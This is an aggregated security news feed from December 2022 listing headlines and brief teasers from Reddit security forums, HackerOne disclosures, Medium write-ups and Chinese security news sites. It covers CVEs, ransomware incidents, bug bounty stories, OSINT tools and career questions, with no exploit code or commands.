    Hi Teamers, I've created a Cobalt Strike Aggressor (CNA) Script I've dubbed ipv4guard. As it's my first one ever, I'm looking for feedback and testers (and contributors!! ;D) to maybe help improve it. The script is for Cobalt Strike and, per the blurb I wrote, A Cobalt Strike Aggressor Script that aims to help prevent errant Cobalt Strike commands from being executed on non-whitelisted / off-limit / out-of-scope / unapproved IPv4 addresses. I've tested it as best I can but obviously can't, by my lonesome, give it as wide a berth of testing as the wider community could. Cheers submitted by /u/savsaintsanta [link] [comments]
    Return to Sender - Detecting Kernel Exploits with eBPF
    submitted by /u/mdaverde [link] [comments]
    Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.
    submitted by /u/boutnaru [link] [comments]
  • Open

    ReDoS (Rails::Html::PermitScrubber.scrub_attribute)
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1804128 - Bounty: $4000
    Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)
    Ruby on Rails disclosed a bug submitted by 0b5cur17y: https://hackerone.com/reports/1656627
    Incomplete fix for CVE-2022-32209 (XSS in Rails::Html::Sanitizer under certain configurations)
    Ruby on Rails disclosed a bug submitted by 0b5cur17y: https://hackerone.com/reports/1654310
    Electron CVE-2022-35954 Delimiter Injection Vulnerability in exportVariable
    Internet Bug Bounty disclosed a bug submitted by theinternetofdefcon_: https://hackerone.com/reports/1787810 - Bounty: $2400
  • Open

    OSINT Tools
    GHunt — https://github.com/mxrch/GHunt Continue reading on Medium »
    InfoSecSherpa’s News Roundup for Wednesday, December 14, 2022
    InfoSecSherpa: Your Guide Up a Mountain of Information! Continue reading on Medium »
    Simply Telegram-channels OSINT tool…
    Let’s talk about a somewhat non-standard method of researching Telegram communities related to the study of published content. Continue reading on Medium »
    Can open-source tools help local newsrooms do video journalism?
    How reporters can use cellphone videos, satellite imagery, and other visual data to uncover local stories. Continue reading on JSK Class of 2023 »
    OSINT-Discovering Email Addresses
    Tools to discover emails - Hunter.io   - 100/50 Free searches - Phonebook.cz - Voilanorbert.com - Clearbit Connect (Gmail Extension) - To… Continue reading on Medium »
  • Open

    Cloning a larger hard drive to a smaller one?
    I created a forensic load for our systems, but all I had at the time was a 500gb SSD. I only used around 100gbs of that. I'd like to clone that onto a 256 in a forensically sound way but I'm not sure how. I know our TX1s won't clone it even if the bigger drive has less than 256gb of data. Is there a way to do this that's forensically sound or will I just have to make a from-scratch forensic load on a 256? submitted by /u/Sandyblanders [link] [comments]
    A Deep Dive into BianLian Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Is there a way to track a user copying data from a USB drive? For example, Computer A has a connected USB drive, the user turns off Computer A, connect the USB drive to Computer B to copy data, and return USB to Computer A. How can we prove data was copied from the USB drive?
    Right now it looks like the user is just copying data from Computer A to the USB drive. However, I think the user is copying data to a non-company computer and returning the USB drive. How can we prove data was copied from the USB drive to another computer? Thanks. submitted by /u/Past_Programmer [link] [comments]
  • Open

    Driver HackTheBox Walkthrough
    Introduction The driver is an easy-rated Windows box on the HackTheBox platform. This is designed to understand initial exploitation using an SCF file and further The post Driver HackTheBox Walkthrough appeared first on Hacking Articles.
  • Open

    MITRE TTP mapping to NIST 80037 Threat Events
    Is anyone aware of any mapping between the MITRE TTPs and the NIST 800-37 Threat Events? E.g. Threat Event x is applicable to the following TTPs: TA1 = TTPs 1,3&5 TA2 = TTPs 1,2,3 … and so on. submitted by /u/EmergencyShow [link] [comments]
    Understanding etc/hosts and C&C
    "Bad actors will commonly change the etc/hosts file for C&C reasons" Could someone explain the technical part of how this works? I understand that creating a google.com entry with a malicious IP in etc/hosts will cause the google.com visit to be a malicious website, however I'm having a hard time understanding how a botnet communicates with the C&C server here. Thanks! submitted by /u/Jaruki_Jurakami [link] [comments]
    Helpdesk/SysAdmin/NetAdmin or Software Engineer for starting ?
    I'm 22 and I don't have a Degree or Diploma; I finished computer high school in 3 years. This course is for adults who dropped out of their studies in adolescence. I am undecided whether to start as a Helpdesk/SysAdmin/NetworkAdmin or as a developer... My long-term goal is Cybersecurity but first I wanted to get some experience in IT... What do you recommend between the two? What are the more valuable certs for Europe in Networking and Linux Sysadmin? I heard that CompTIA certs are more considered in the US and not in Europe submitted by /u/HelloWorldCLang [link] [comments]
    What does TIKTOK actually do that is so bad?
    I am curious. Is TikTok worse than the other hundred apps I have on my phone? I installed a firewall logger on my Android phone and it saw things like the ETSY app sending messages to Facebook when I was not even running the Etsy app and had not run it for months. Another app showing the phases of the moon was trying to send messages when I have not run that app for over 6 months. It looks to me like everything on my phone is trying to spy on me. What does the TikTok app do that makes it worse than the rest of these apps? submitted by /u/GreenAlien10 [link] [comments]
    How realistic is the threat?
    So let's say you want to print off some sensitive documents. Public printers are likely to have hard drives that contain copies of the printed documents, though I have no idea whether these commonly overwrite data or anything related to that. I'm wondering whether it's likely that someone is actually looking at these drives and pulling off data of interest. I can imagine some library technician randomly connecting to printers and pulling off financial data and whatnot that people are printing and trying to steal money. But when I was an IT tech that wasn't really in my knowledge bank; I didn't even know they had HDDs, much less know how to access them for that purpose, as my job was just to fix them at a basic level. I don't know if most big-brand corporate printers have apps that allow people to pull this data off, or would the drive have to be pulled manually and connected to another system to access the files? How likely is this ever to happen at a public place like a library or a printing store? Does it make more sense to go somewhere a lot of people go, in the hope that by the time anyone goes looking your documents would have been overwritten, or somewhere with less use so it's less likely anyone would have a reason to look? submitted by /u/sephstorm [link] [comments]
    BurpSuite intercept host filter
    Hi everyone, I hope you are having a great day. I wish to intercept only HTTP request into a certain host in BurpSuite (community). How can I do that? Thanks in advance! submitted by /u/Far_Lifeguard_3262 [link] [comments]
    Is there any way to automatically detect whether a website is using a cookie banner or not?
    Hey everyone, I am not sure if this is the correct subreddit ( please suggest a better one if there is one), but we are working on analyzing the cookie used by a website and privacy consent. As the first step, we want to detect whether the website uses a cookie banner or not using a script. My initial idea is to do HTML scraping and look for strings like 'We use cookies to enhance your browsing experience, serve personalized ads or content, and analyze our traffic. By clicking "Accept All", you consent to our use of cookies.' Is there any better way one can do this? I know there is __cmp function under GDPR, but not a lot of websites use this. Any other way one can approach this problem? submitted by /u/proudsubiii [link] [comments]
    Compromised machine with remote logon in app, but nothing in rdp?
    Hey boys and girls. Got an odd one here where a machine got popped, and there is a logon type 3 in the Security logs, but the RDP and terminal service logs show nothing for those dates. What is going on? submitted by /u/ThePorko [link] [comments]
  • Open

    How I found an OpenRedirect Vulnerability in Our University Website
    Hello Curious Hackers, This is my First WriteUp about “ How I found an OpenRedirect Vulnerability in Our University Website !!! “. Continue reading on Medium »
    How To Handle A Bug Bounty Program Internally
    Most businesses are not prepared to provide public bug bounties because they lack the necessary procedures, have too many vulnerabilities… Continue reading on Medium »
    Privilege escalation leads to deleting other user’s account and company Workspace [Access Control]
    Dear Folks! Continue reading on Medium »
  • Open

    CVE-2022-27518: Unauthenticated RCE in Citrix ADC and Gateway
    Article URL: https://www.tenable.com/blog/cve-2022-27518-unauthenticated-rce-in-citrix-adc-and-gateway Comments URL: https://news.ycombinator.com/item?id=33987511 Points: 1 # Comments: 0
  • Open

    Recon Skills and Tips — Learn All About Them at IWCON 2022
    No content preview
    Why and How to Use HTTP Security Headers?
    No content preview
  • Open

    SecWiki News 2022-12-14 Review
    Analysis of the SpEL injection flow and how to use it in CTFs by SecIN社区 For more recent articles, visit SecWiki
  • Open

    Unusual Cache Poisoning between Akamai and S3 buckets
    submitted by /u/albinowax [link] [comments]
    Technical Review: A Deep Analysis of the Dirty Pipe Vulnerability
    submitted by /u/gfdgfbal [link] [comments]
    Hacking the MBTA CharlieCard from 2008 to Present
    submitted by /u/_zio_pane [link] [comments]
    FRESH from Black Hat EU: Dirty Vanity, the windows-fork based injection method is public
    submitted by /u/LezG00 [link] [comments]
    Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.
    submitted by /u/boutnaru [link] [comments]
    Vulnerabilities found on Arcadyan Routers
    Finally (!!!) I was able to make this public. It ain’t much but it is honest work. submitted by /u/asherdl02 [link] [comments]
  • Open

    Announcing OSV-Scanner: Vulnerability Scanner for Open Source
    Article URL: https://security.googleblog.com/2022/12/announcing-osv-scanner-vulnerability.html Comments URL: https://news.ycombinator.com/item?id=33984439 Points: 1 # Comments: 0
    OSV-Scanner| Vulnerability Scanner for Open Source from Google
    Article URL: https://osv.dev/ Comments URL: https://news.ycombinator.com/item?id=33982534 Points: 2 # Comments: 2
  • Open

    Bypassing CORTEX XDR — A Case Study in the Power of Simplicity
    To start, I would like to introduce myself. My name is Ben Tamam, 25 years old. I’m a Red Teamer and a Team Lead of the offensive… Continue reading on Medium »
  • Open

    MIIT releases the Measures for the Administration of Data Security in the Industry and Information Technology Sector (Trial)
    As the top-level institutional document for data security management in the industry and information technology sector, the Measures consist of eight chapters and forty-two articles, focusing on the questions of "who manages, what is managed and how it is managed" for data security in the sector.
    Measures for the Administration of Cybersecurity Multi-Level Protection in the Electric Power Industry released
    The Measures consist of six chapters and twenty-eight articles and apply to the multi-level cybersecurity protection work of power enterprises that build, operate, maintain and use networks within China (nuclear safety excepted).
    FreeBuf Morning Report | Japan's new National Security Strategy introduces the principle of active cyber defense; two Swedish cities hit by cyberattacks
    The LockBit hacking group claims to have stolen nearly 76 GB of data from the California Department of Finance.
    LockBit hacking group strikes again, with the California Department of Finance as the victim
    The California Cybersecurity Integration Center (Cal-CSIC) has begun investigating the attack.
    After announcing its open-source plan, Google launches the largest open-source vulnerability database
    Google announced the open-sourcing of OSV-Scanner, an open-source vulnerability scanner that can access vulnerability information for all kinds of projects, strengthening software supply chain security.

  • Open

    A New LOLBin? Using the Windows Type Command to Upload/Download Files
    The forgotten functionality between the Type command and WebDAV Continue reading on Medium »
    Buffer Overflow — Spiking
    Buffer overflow spiking is a form of computer security attack that involves feeding more data to a buffer or temporary storage region than… Continue reading on Medium »
    Certified Red Team Operator (CRTO) Review
    The Certified Red Team Operator (CRTO) course is an offering from Zero Point Security which aims to teach “the basic principles, tools and… Continue reading on Medium »
    CVE-2022–42889 Text4Shell Vulnerability
    Apache Common Text Continue reading on MII Cyber Security Consulting Services »
    Finding the Gap: How Curiosity and Creativity Drives Threat Detection
    Let the Real World be your Lab with Mitre ATT&CK, Atomic Red Team, and Sigma Continue reading on Medium »
  • Open

    Penetration testing, or pentesting, is the process of simulating a cyber attack
    On a computer system, network, or web application to test its defenses and identify vulnerabilities. This is often done by ethical hackers… Continue reading on Medium »
    Explaining Vulnerabilities : Broken Access Control
    What is Broken Access Control? Continue reading on Medium »
    Lack of Rate Limiting
    Recently found a RL vulnerability and wanted to share Continue reading on Medium »
    Doing it the researcher’s way: How I Managed to Get SSTI (Server Side Template Injection) which…
    Hello everyone, Continue reading on Medium »
    IDOR allows updating user profiles, leading to full account takeover. | Part 02
    Hi there, amazing hackers and security enthusiasts! Today, I want to share something really important with you. I’m sure you’ll find it… Continue reading on Medium »
    Getting Started With 5 Bugs part(1)
    In today’s write-up I’m going to explain the first bug of this series to get you started in bug bounties Continue reading on Medium »
    Hacking server using SSTI
    These days we mostly witness website with more of dynamic content than the static content. There are several ways to achieve the mentioned… Continue reading on Medium »
    SUBDOMAIN ENUMERATION
    Subdomain enumeration is the process of identifying all subdomains for a  given domain. This can be useful for a variety of purposes, such… Continue reading on Medium »
    Announcing the launch of Gametree Bug Bounty Program
    Continue reading on Gametree.gt »
  • Open

    Raytheon vs Northrop Grumman vs General Dynamic
    I got 3 offers as a new grad. I wonder which one is better for career growth? They're kinda similar in some way except salary. And I will get top secret at Northrop Grumman. submitted by /u/ILikeNuke112 [link] [comments]
    Do corporate IT policies typically allow USB webcams?
    The regular built-in laptop webcams (even business class laptops) are quite poor in quality, to say the least. I'm curious how corporate IT manages this. Is everyone, at corporations big and small, stuck with terrible, low-res video for their Teams calls? submitted by /u/icysandstone [link] [comments]
    PHP execution disabled, now things won't work
    Hi, followed malcare.com's Disable PHP Execution & Directory Browsing For WordPress Security (malcare.com) and now when I upload images for wordpress posts, it shows like this: https://i.imgur.com/nRnVkqv.png https://imgur.com/Q4bz1MB But when I delete the .htaccess file from the wp-uploads folder, the images start working as they should. Disabling php execution is necessary nowadays but how do I bypass? submitted by /u/yoyobono [link] [comments]
    Retention of files in Windows Server.
    Hello, I need your help in a very urgent matter. I implemented this for retention of files on my windows server : https://learn.microsoft.com/en-us/windows-server/identity/solution-guides/deploy-implementing-retention-of-information-on-file-servers--demonstration-steps-?tabs=gui And it worked perfectly. But, I want to do retention by tag not by path. I think it might be doable in the classification management but I'm not quite sure. Did anyone try this? Or did a retention of files in a windows server? Your help is so appreciated. Thank you so much in advance. submitted by /u/lenaposts [link] [comments]
  • Open

    apk.sh makes reverse engineering Android apps easier, automating some repetitive tasks like pulling, decoding, rebuilding and patching an APK.
    submitted by /u/FipoKa [link] [comments]
    Sandworm.JS - dynamically analyses over 2M javascript packages to offer zero day, real time protection against malicious scripts.
    submitted by /u/sculabobone [link] [comments]
    A Deep Dive into BianLian Ransomware [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    AWS ECR Public Vulnerability
    submitted by /u/Gallus [link] [comments]
    A Server Side Request Forgery protection library for Golang
    submitted by /u/nibblesec [link] [comments]
    Critical Citrix ADC Bug Exploited in the Wild
    submitted by /u/YogiBerra88888 [link] [comments]
    An Open Source tool for Fixing the Accidental Public GitHub Repo
    submitted by /u/amirshk [link] [comments]
    Precious Gemstones: The New Generation of Kerberos Attacks
    submitted by /u/0xdea [link] [comments]
    Exploiting CVE-2022-42703 - Bringing back the stack attack
    submitted by /u/boutnaru [link] [comments]
  • Open

    Pivoting
    No content preview
    Advent of Cyber 2022 [Day 14]-Packet Analysis | Simply having a wonderful pcap time — Simple Write…
    No content preview
    Advent of Cyber 2022 [Day 12]-Malware Analysis Forensic McBlue to the REVscue! Write up
    No content preview
    Windows LNK File Analysis in Forensic IT Reviews
    No content preview
    Directory Payload List via PayloadBox
    No content preview
    SQL Injection Payload List
    PayloadBox Continue reading on InfoSec Write-ups »
    XML External Entity (XXE) Injection Payload List
    No content preview
    Write-up: DOM XSS in innerHTML sink using source location.search @ PortSwigger Academy
    No content preview
  • Open

    AWS ECR Public Vulnerability
    Article URL: https://blog.lightspin.io/aws-ecr-public-vulnerability Comments URL: https://news.ycombinator.com/item?id=33976053 Points: 2 # Comments: 0
  • Open

    Retrieving Carrier Name from Phone Number in Python: A Step-by-Step Guide
    To retrieve the carrier name from a phone number using the phonenumbers library in Python, you can use the CarrierMapper.name_for_number()… Continue reading on Medium »
    Rabbit Hole Contract by Hacktoria — A Complete Walkthrough
    This is a special contract, which was launched on the one year anniversary of hacktoria.com. So, congratulations Hacktoria and all its active… Continue reading on System Weakness »
    Rabbit Hole Writeup
    Special contract celebrating Hacktoria.com 1-Year anniversary. Continue reading on The Sleuth Sheet »
    Guide to your first Trace Labs CTF
    Why not use your OSINT skills for a good cause? Continue reading on Medium »
    Search across the Internet of Things, IPs, MACs, domains and subdomains.
    Spider Foot is an automated OSINT service specializing in investigating websites, domain names and IP addresses. The service, like… Continue reading on Medium »
  • Open

    Attacker can smuggle a malicious domain in a URI object.
    Ruby disclosed a bug submitted by djspinmonkey: https://hackerone.com/reports/156615
    DoS via markdown API from unauthenticated user
    GitHub disclosed a bug submitted by legit-security: https://hackerone.com/reports/1619604 - Bounty: $4000
  • Open

    15 Episodes/Movies 2022 From real-debrid.com
    submitted by /u/mingaminga [link] [comments]
  • Open

    SecWiki News 2022-12-13 Review
    uuWAF: a free, high-performance, highly extensible open-source WAF by ourren. For more recent articles, visit SecWiki
  • Open

    Java IO Notes
    Java's core library java.io provides a comprehensive set of IO interfaces; this article explains byte streams, character streams, conversion streams and more in detail.
    Mark 9 a.m. tomorrow | CIS 2022 Cybersecurity Multidimensional Space-Time is about to open
    Mark 9:30 a.m. tomorrow; let's attend, participate and exchange ideas online together.
    Not long after the AI chatbot ChatGPT went viral, regulations were issued
    The Provisions on the Administration of Deep Synthesis of Internet Information Services take effect on January 10, 2023.
    FreeBuf Morning News | Three major carriers: will delete users' travel-code data; India's Ministry of External Affairs leaked foreigners' passport information
    Over the next five years, global data volume will grow at a compound annual growth rate of 21.2%; by 2026, global data volume will reach 216 ZB.
    Notes on a code audit of a certain "Wei" product
    Notes on a code audit of a certain "Wei" product
    A Belgian city hit by a ransomware attack, citywide communications disrupted
    Last week the Belgian city of Antwerp suffered a cyberattack, and the Play ransomware gang promptly and publicly claimed responsibility.
    Royal ransomware attacks target the US healthcare system
    Royal ransomware is attacking the US healthcare system, with ransom demands ranging from $250,000 to $2 million.
    Three major carriers: deleting users' travel-related data simultaneously
    China Mobile, China Unicom and China Telecom stated that once the "Communication Travel Card" service went offline at 00:00 on December 13, they would delete users' travel-related data at the same time, safeguarding personal information security in accordance with the law.
    India's Ministry of External Affairs leaked foreigners' passport details
    The Global Pravasi Rishta Portal, the Indian Ministry of External Affairs platform for liaising with the overseas Indian diaspora, leaked sensitive data including personal names and passport details.
    How to use Legitify to protect your GitHub organization's assets
    Legitify helps researchers and IT staff easily detect and mitigate potential misconfigurations, security issues and compliance problems in GitHub assets.
    How to use r4ven to check whether your electronic devices leak IP and GPS information
    r4ven is a user-sensitive-information security testing tool that hosts a fake website which uses an iframe to display the content of a legitimate site.
    scscanner: a powerful large-scale status-code scanner
    scscanner is a powerful large-scale status-code scanning tool that helps researchers read a list of URLs from a file and retrieve the status-code responses of target websites in bulk.
  • Open

    Fuzzing the Shield: CVE-2022–24548
    Author: Daejin Lee, Seunghoe Kim, Donguk Kim, Eugene Jang Continue reading on S2W BLOG »
  • Open

    BlackBird — Osint Tool
    Blackbird is an OSINT tool for searching for accounts by username across more than 574 social networks. Continue reading on Medium »
    Terrorist Smugglers Writeup
    This contract needs to be off the books. Continue reading on The Sleuth Sheet »
    OSINT: Finding the owner of a bank card.
    Checking by credit card number: Continue reading on Medium »
    OPEN-SOURCE INTELLIGENCE [OSINT]
    OSINT, or Open-Source Intelligence, refers to the practice of collecting and analyzing information from publicly available sources. This… Continue reading on Medium »
  • Open

    CVE-2019–6238: Apple XAR directory traversal vulnerability
    With the security update released in 2019, Apple fixed a directory traversal vulnerability in XAR. Continue reading on Medium »
    PII data exfiltration within minutes
    Hello Everyone, Continue reading on Medium »
    Using Linux effectively (for cyber sec)
    Intro Continue reading on Medium »
    What is CIA Triad & Why is it important?
    Hello everyone, Continue reading on Medium »
    Portswigger Lab: JWT authentication bypass via algorithm confusion with no exposed key, a slightly…
    , or how I learned the importance of RTFM yet again Continue reading on InfoSec Write-ups »
    Why Ethical Hackers Should Learn How to Program
    Understanding the basics of coding can give ethical hackers a major advantage in their work. Continue reading on The Gray Area »
  • Open

    A New MacOS Persistence and Deception Technique: Default Application Hijacking
    By Gordon Long (@ethicalhax) Continue reading on Medium »
    AWS OIDC — EKS Abuse
    Hi readers, here we will be looking into how can we allow Kubernetes to perform certain tasks in aws. Continue reading on Medium »
    ECPPTv2 Exam Review
    Hola, I would like to share my experience on the ECPPTv2 Exam and give some tips and resources that I learned. I passed the exam on 22nd… Continue reading on MII Cyber Security Consulting Services »
  • Open

    Link-shortener bypass (regression on fix for #1032610)
    Twitter disclosed a bug submitted by jub0bs: https://hackerone.com/reports/1421345 - Bounty: $560
    cd=false (DNSSEC) not respected in DNS over HTTPS JSON requests
    Cloudflare Public Bug Bounty disclosed a bug submitted by mattipv4: https://hackerone.com/reports/1724464 - Bounty: $250
  • Open

    A Year Later, That Brutal Log4j Vulnerability Is Still Lurking
    Article URL: https://www.wired.com/story/log4j-log4shell-one-year-later/ Comments URL: https://news.ycombinator.com/item?id=33957395 Points: 4 # Comments: 0
  • Open

    SecWiki News 2022-12-12 Review
    Automated analysis and repair of use-after-free vulnerabilities by ourren; Pentesting MSSQL - Microsoft SQL Server by 路人甲; Ten misconceptions in software development security practice by ourren; The ghost king in the shell: JavaWeb memory shells by ourren; SecWiki Weekly (Issue 458) by ourren; Attack attribution through PDF file information by ourren; [HTB] Seal Writeup by 0x584a. For more recent articles, visit SecWiki
  • Open

    What does AskNetsec think about my threat hunter learning path?
    Hi r/AskNetsec, I've recently fallen down the rabbit hole of threat hunting: there's a business need for it at my organization, and more importantly what I'm learning is incredibly interesting and I love the investigative process/detective work. In short, the intrinsic motivation is high and I see myself doing this for a long time. I'd like to share some resources I'm leveraging to help me begin my journey, and I would very much appreciate a critique of my approach: Windows Internals: System architecture, processes, threads, memory management, and more, Part 1 (Developer Reference) to understand and interpret endpoint activity. Must Learn KQL: Essential Learning for the Cloud-focused Data Scientist to efficiently comb through data for my hypotheses. Learn Azure Sentinel: Integrate Azure security with artificial intelligence to build secure cloud systems to understand the basics of our SIEM. Microsoft Sentinel in Action: Architect, design, implement, and operate Microsoft Sentinel as the core of your security solutions for a more advanced understanding of our SIEM. Microsoft Security Operations Analyst Exam Ref SC-200 Certification Guide: Manage, monitor, and respond to threats using Microsoft Security Stack for securing IT systems to expand my scope for managing threats within the Microsoft suite. Where should I focus my attention first? What blogs/podcasts should I subscribe to stay up-to-date on the latest attacks and how they work? Are there any important information sources I'm missing? At work, I'm in the process of understanding business requirements, identifying crown jewels, revealing where we do and do not have visibility, defining a baseline/what is "normal," etc., etc. Thanks in advance for your guidance! submitted by /u/4alloween [link] [comments]
    Security Assessment of application/server setup
    Hi, How do you conduct a security assessment of new software? For example, our HR department wants to purchase a new HR tool. Right now we are testing it and I want to conduct a security assessment of this tool. My checklist: 1) Check the vendor's security certifications (SOC2, ISO, etc.); 2) Check server settings and configuration (not sure how to do this, but something related to: if there is something public, scan for vulnerabilities etc); If the server is on the client side, so back to point 1. 3) Check roles (check who has what access in this software and who has access to sensitive information, such as salaries etc); 4) Check internal settings related to software; Maybe there are some questionnaires? submitted by /u/athanielx [link] [comments]
  • Open

    Detailed analysis of wide-byte injection
    Wide-byte injection: MySQL defaults to GBK encoding. GBK is a Chinese character encoding in which two bytes represent one Chinese character and one byte represents an English letter or digit; so two bytes make a wide byte and one byte a narrow byte. Cause of the vulnerability: MySQL's default
    Tracing a TrickBot banking trojan attack
    After a series of investigations and attribution, the attack path was determined to be a historical vulnerability in routers manufactured by **NETGEAR**.
    FreeBuf Morning News | A Pacific island nation suspected of suffering a ransomware attack that cut its internet for a month; a year after Log4j, many companies still unpatched
    A year after the Apache Software Foundation disclosed the Log4j vulnerability last November, many systems remain unpatched against it.
    The travel card goes offline and health codes will leave the stage; what should happen to our data?
    What should be done with the massive amounts of user data that were collected?
    Obtaining and applying Mobile Internet Application (App) security certification
    Recently many companies and security practitioners have asked about CCRC's Mobile Internet Application (App) security certification, including an introduction to the certification, preparation, points to note, certification duration and how hard it is to pass.
    Python malware AndroxGh0st begins stealing AWS keys
    AndroxGh0st mainly scans exposed .env files and parses various keys out of Laravel application configuration data.
    A year after Log4Shell's disclosure, most companies remain exposed to attack
    Although fewer publicly reported attacks have involved the vulnerability than expected, nearly three quarters of enterprises remain exposed to it.
    Cisco discloses a severe vulnerability, but the patch won't be released until January next year!
    A remote attacker could exploit the vulnerability to cause remote code execution or a denial-of-service (DoS) condition.
    Pwn2Own 2022 concludes; contestants win nearly $1 million in prizes
    36 teams from 14 countries and regions won a total of $989,750 in prize money.
    "Fahai" unboxing explained: a new generation of intranet-internet product
    Fahai's networking feature can turn a single device into a distributed one, with custom routing nodes for different network segments, satisfying highly configurable SDP deployments; it not only distributes network functions but also spreads out price and performance costs.
    Attribution series | Attribution via PDB path information in PE files
    PDB (Program Data Base) files are generated by Microsoft Visual Studio during compilation and linking and store the basic information VS needs to debug a program. How can PDB be used to trace an attacker?
    Attribution series | Attack attribution via PDF file information
    Uncovering little-known information in attackers' PDFs will greatly help our attribution work!
  • Open

    Is there any encryption that logs the computername/username of the system trying to access a hard drive
    One of our clients has sent an external hard drive containing some IP to one of their subsidiaries and now they suspect that there was probably some data leakage. They have asked us if it is possible to figure out if data was copied to any system. They are also checking if the disk was encrypted before sending and if so, is it possible to know who tried to access it. I have responded with the following --- In such a case we can get the following data 1. If any data was edited. 2. To the extent possible, if any data was deleted. Any evidence of data copying from the hard drive may be present on the laptop(s) from which the data copying was done. Getting this data will only be possible if the laptop is available for forensic analysis. --- I am pretty sure this looks ok, but would like confirmation from my fellow forensicators. Also for encryption, I am pretty sure that bitlocker or veracrypt do not do this, but are there any other FDE which logs the name/date of the machine that tries to access it? submitted by /u/indianadmin [link] [comments]
  • Open

    Precious Gemstones: The New Generation of Kerberos Attacks
    Unit 42 researchers show new methods to improve detection of a next-gen line of Kerberos attacks, which allow attackers to modify Kerberos tickets to maintain privileged access. The post Precious Gemstones: The New Generation of Kerberos Attacks appeared first on Unit 42.
  • Open

    IW Weekly #37: ChatGPT for Pentesting, Hacking Govt.
    No content preview
    Write-up: SQL injection with filter bypass via XML encoding @ PortSwigger Academy
    No content preview
    TryHackMe ultraTech CTF
    No content preview
    Advent of Cyber 2022 [Day 11]-Memory Forensics-Not all gifts are nice Write up
    No content preview
    Lian_Yu — TryHackMe Writeup by Karthikeyan
    No content preview
    Forensics —Writeup
    No content preview
    Advent of Cyber 2022 [Day 7]-Cyber Chef Maldocs roasting on an open fire Writeup by Karthikeyan…
    No content preview
    Advent of Cyber 2022 [Day5] Email Analysis — It’s beginning to look a lot like phishing by…
    No content preview
    Advent of Cyber Day 2~ Log Analysis Santa’s Naughty & Nice Log
    No content preview
  • Open

    Finding JIT Optimizer Bugs using SMT Solvers and Fuzzing
    submitted by /u/surrealisticpillow12 [link] [comments]
    IATelligence is a Python script that will extract the IAT of a PE file and request GPT to get more information about the API and the ATT&CK matrix related
    submitted by /u/boutnaru [link] [comments]
  • Open

    What is Elon Musk’s X App?
    Elon Musk has been in many headlines this year for a multitude of different reasons. Continue reading on Bitcoin News Today & Gambling News »
  • Open

    Wi-Fi Legacy Security Mechanisms
    submitted by /u/tbhaxor [link] [comments]

  • Open

    GraphQL Exploitation Techniques | Fintech Bug Bounty — Part 2
    This article is the 2nd part of the “Fintech Bug Bounty” series. Continue reading on Medium »
    Mobile Bug Bounty Hunting? Enter BLE
    If you are hunting mobile bug bounties you must know by now how difficult it can be to find new kind of vulnerabilities. Common… Continue reading on Medium »
    The Application Penetration Testing Process: A checklist for every engagement
    This article delivers an overview of application penetration tests and can be utilized as a static reference to stay on track during… Continue reading on InfoSec Write-ups »
    Finding URLs (cyber sec)
    Overview Continue reading on Medium »
    IDOR + PII Leakage
    Hello Hunters!! Continue reading on Medium »
    Parameter Tampering Bug ₹3999 -> 3:
    This is my second parameter tampering bug. I reported the bug to the company on 22–02–2022 but they still haven't fixed it. So here I… Continue reading on Medium »
    How “I hacked the Dutch government and got the lousy t-shirt”
    Hello everyone, This is my first write-up. In this write-up, I will try to explain how I was able to find 6 vulnerabilities in the Dutch… Continue reading on Medium »
    CIA triad and CVSS 3.0 | A complete guide
    A guide about the CIA triad and CVSS 3.0. Continue reading on InfoSec Write-ups »
    Cybersecurity Resources You Need to Boost Your Knowledge
    Nothing indicates that this will change anytime soon in the world of cybersecurity. Continue reading on Bug Zero »
  • Open

    How to become lead security management?
    Hi, Long story short, I am rather interested in what courses you could recommend in this direction and to be more specific, I am interested perhaps more in the direction of "come to the company and set up cybersecurity from scratch": more about administrative functions, probably something similar to auditing or consultation. I also wonder if you could advise something about the development of soft skills. I often work in pairs with team leaders or CISOs, but they do all the communication stuff while it's difficult for me to do any verbal interactions with other people and it prevents me from taking on additional responsibility. I would like to improve my knowledge in the section "infosec" and "soft skills". What could you advise? submitted by /u/athanielx [link] [comments]
    Best ways to monitor web proxy logs
    Hi to everyone, What are the best ways for monitoring web proxy logs? How to detect suspicious URLs, top level domains, etc. thanks to web proxy log analysis? I've thought about python scripting to parse log files and analyze them but idk if it's the best method for this task and if there are some better approaches. Thank you in advance for your answers :) submitted by /u/0xOfenomeno [link] [comments]
    Wireless keyboard and mouse question
    Hello! I was wondering if you fine people at netsec could help explain whether the Logitech MK850 wireless keyboard and mouse combo, linked here has the potential for carrying any viruses or malware that could be given to the MacBook. I read that keyboards and mice if they are programmable can have viruses or malware on them? So just wasn’t sure, thank you! submitted by /u/Normal-Question-1994 [link] [comments]
    HTM email attachment
    I received an htm attachment in my office mail box. I want to analyze the file. It is mostly I think HTML smuggling. It is from icloud email domain. Want to know how to get this in isolated env and check the hash file in VT and other places? submitted by /u/sakhik2014 [link] [comments]
    Phone hacked and need help
    My phone may be compromised and I'm being followed everywhere I go. I am trying to hire an IT person to assist me with locating the person or APP. Any recommendations would be helpful? Thank you submitted by /u/bellarain1996 [link] [comments]
    Is this 2FA extension safe?
    And if not is there a SAFE 2FA app or extension on laptop? Authenticator submitted by /u/Exotic_Insurance_969 [link] [comments]
    How to best set myself up for success in getting a cyber security internship?
    Hi! I'm a third year college student studying Information Science. I just recently changed my field of study though, as my freshman and sophomore year I was a Public Health major. I've come to really love learning network fundamentals and cyber security and have been gaining knowledge on what I need to do in order to pursue a career in this field. I currently work as an IT Help Desk student in a major department on my campus. I know the basics of Python and I've been learning linux, bash scripting, and have really enjoyed doing beginner CTFs. I've also been studying Net+ and Sec+ resources. I'm not sure if I want to take the exam yet but I know that the information and resources provided for studying are very useful and relevant. I want to participate in an internship because I know that the best way to learn is through hands on experience, but due to my transition and me not having any relevant course work I'm wondering how likely am I to even get offered a position. I know that not everyone is looking for a candidate with the most technical skills and that soft skills are a thing too, so what would be the best way to highlight that in my resume? I was wondering if I could get any tips on good ways to structure my resume, what other resources I need to be looking into in order to show that I'm a good candidate, and any other relevant advice. Thank you! Edit: Added more info submitted by /u/faversace [link] [comments]
  • Open

    DATA BASES #01
    So, has your CPF been looked up today? Maybe? Continue reading on Medium »
    Telegram… TON… OSINT!
    We continue the topic started in the previous message… Continue reading on Medium »
